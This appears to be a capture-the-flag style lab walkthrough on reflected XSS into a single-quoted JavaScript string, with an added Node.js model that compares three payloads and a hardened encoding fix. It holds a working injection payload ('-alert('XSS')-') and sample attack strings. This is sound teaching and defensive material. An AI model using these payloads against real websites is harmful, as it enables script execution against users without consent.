In this post, we’re going to be solving the lab: “Reflected XSS into a JavaScript string with angle brackets HTML encoded”.

Reflected XSS into a JavaScript string lab start screen

In this case, because the application HTML-encodes angle brackets, we cannot simply inject a <script> tag. To solve the challenge we need a payload that escapes from the JavaScript string it is reflected into and calls the alert function.

First of all, let’s access the lab:

Lab main page with search bar

Once we access it, we find ourselves before a search bar, so we’re going to use it by searching for a random word:

Search form with test term

When we perform the search, we can observe that the word we searched for appears, among other places, in the following part of the source code:

Source code showing search term inside a JavaScript string

As we can observe, the value lands inside a single-quoted JavaScript string. You might think: ok, I close the string, put an alert after it and done, something like:

  • var searchTerms = ''alert('XSS')'';

But this is not valid JavaScript. A string literal followed directly by an identifier (`'' alert(...)`) is a syntax error, so the browser refuses to run the whole script and the alert never fires. The payload has to leave the line as a syntactically valid expression. The trick is to join the pieces with an operator: a hyphen (the subtraction operator) works because `'' - alert('XSS') - ''` is a valid arithmetic expression, and to evaluate it the engine must call alert('XSS'); the resulting NaN is simply assigned to searchTerms. A `+` would parse too, but in a query string `+` is decoded as a space, which is why the hyphen is the usual choice. There is a more detailed explanation of this on StackOverflow.

That said, we place a payload like:

  • '-alert('XSS')-'
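To make the reasoning above concrete, here is an added example (my own code, not the original post's and not the lab's) that models the reflection point: the page HTML-encodes `<` and `>` but leaves single quotes alone, the reflected value is placed inside `var searchTerms = '...';`, and the script is compiled and run with a stand-in `alert()` that records its calls. The function names, the `PAYLOADS` table and the hardened `buildScriptSafe` variant are all my assumptions for illustration.

```javascript
// Added example, not code from the original post or the lab: a toy model of
// the reflection point, showing why the naive payload is a syntax error, why
// the hyphen-joined one executes, and how the sink should have been written.

// Assumption: the page HTML-encodes < and > in the reflected value but leaves
// single quotes and backslashes untouched (the behaviour the walkthrough shows).
function encodeAngleBrackets(s) {
  return s.replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Build the inline script the vulnerable page emits for a search term.
function buildScript(term) {
  return "var searchTerms = '" + encodeAngleBrackets(term) + "';";
}

// Hardened variant: emit the term as a JSON string literal (escapes quotes,
// backslashes and line terminators) and additionally escape < > / so the
// value can never close the string or the enclosing <script> element.
function buildScriptSafe(term) {
  const literal = JSON.stringify(term)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\//g, "\\/");
  return "var searchTerms = " + literal + ";";
}

// Compile and run an emitted script with a recording stand-in for alert().
// Returns whether it parsed, what alert() was called with, and the value
// searchTerms ended up holding.
function runScript(script) {
  const alerts = [];
  let fn;
  try {
    // Compilation fails here with a SyntaxError if the script is invalid,
    // which is exactly what the browser does with the naive payload.
    fn = new Function("alert", script + "\nreturn searchTerms;");
  } catch (e) {
    return { parsed: false, error: e.name, alerts, value: undefined };
  }
  // Like the real alert(), the stand-in returns undefined, so '' - undefined is NaN.
  const value = fn((msg) => { alerts.push(String(msg)); });
  return { parsed: true, error: null, alerts, value };
}

// Constructed sample inputs: the three attempts discussed in the post.
const PAYLOADS = {
  tag:    "<script>alert(1)</script>", // neutralised by angle-bracket encoding
  naive:  "'alert('XSS')'",            // closes the string but is a syntax error
  hyphen: "'-alert('XSS')-'",          // valid expression, alert() executes
};

for (const [name, payload] of Object.entries(PAYLOADS)) {
  const script = buildScript(payload);
  const r = runScript(script);
  console.log(`${name.padEnd(6)} ${script}`);
  console.log(`       parsed=${r.parsed} error=${r.error} alerts=${JSON.stringify(r.alerts)} value=${String(r.value)}`);
}
const safeScript = buildScriptSafe(PAYLOADS.hyphen);
console.log("safe   " + safeScript);
console.log("       alerts=" + JSON.stringify(runScript(safeScript).alerts));
```

Run it with Node: the `tag` attempt parses but never reaches `alert` because the brackets arrive as `&lt;`/`&gt;`, the `naive` attempt is rejected at compile time with a SyntaxError, and the `hyphen` attempt compiles, calls `alert('XSS')` and leaves `searchTerms` holding NaN. With `buildScriptSafe`, the same hyphen payload is stored verbatim as data and nothing executes; note that the `JSON.stringify` is what protects against the quote escape, and the extra `\u003c`/`\/` escapes cover the case where the encoder is bypassed and `</script>` is needed.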

XSS payload injected in the search field

And when we click search:

Successful alert execution escaping from the JavaScript string

The alert executes. In the source code, the reflected value now looks like this:

Source code showing successfully injected payload

With this, we complete the lab:

Final confirmation of lab success